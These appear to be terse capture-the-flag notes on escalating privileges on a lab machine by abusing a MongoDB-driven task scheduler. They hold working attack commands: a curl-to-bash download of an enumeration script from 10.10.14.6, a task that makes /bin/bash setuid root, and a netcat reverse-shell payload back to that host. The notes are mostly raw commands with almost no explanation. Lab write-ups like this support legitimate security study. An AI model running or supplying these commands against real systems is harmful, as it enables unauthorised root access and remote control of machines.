find / -type f -perm -04000 -ls 2>/dev/null
curl http://10.10.14.6/linenum.sh | bash
cat /var/scheduler/app.js
Looks like it will run a command (system command) as a child process then delete the task
mark@node:~$ mongo -p -u mark scheduler
MongoDB shell version: 3.2.16
Enter password:
connecting to: scheduler
> db.tasks
scheduler.tasks
> db.tasks.insert( {"cmd" : "cp /bin/bash /tmp/adot8; chmod 6755 /bin/bash;" } )
WriteResult({ "nInserted" : 1 })
> db.tasks.find()
{ "_id" : ObjectId("6661beb7ec323c4579a20eae"), "cmd" : "cp /bin/bash /tmp/adot8; chmod 6755 /bin/bash;" }
> db.tasks
scheduler.tasks
>
mark@node:/tmp$ mongo -p -u mark scheduler
MongoDB shell version: 3.2.16
Enter password:
connecting to: scheduler
> db.tasks.insert( {"cmd" : "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.10.14.6 1337 >/tmp/f" } )
WriteResult({ "nInserted" : 1 })
> db.tasks.find()
>
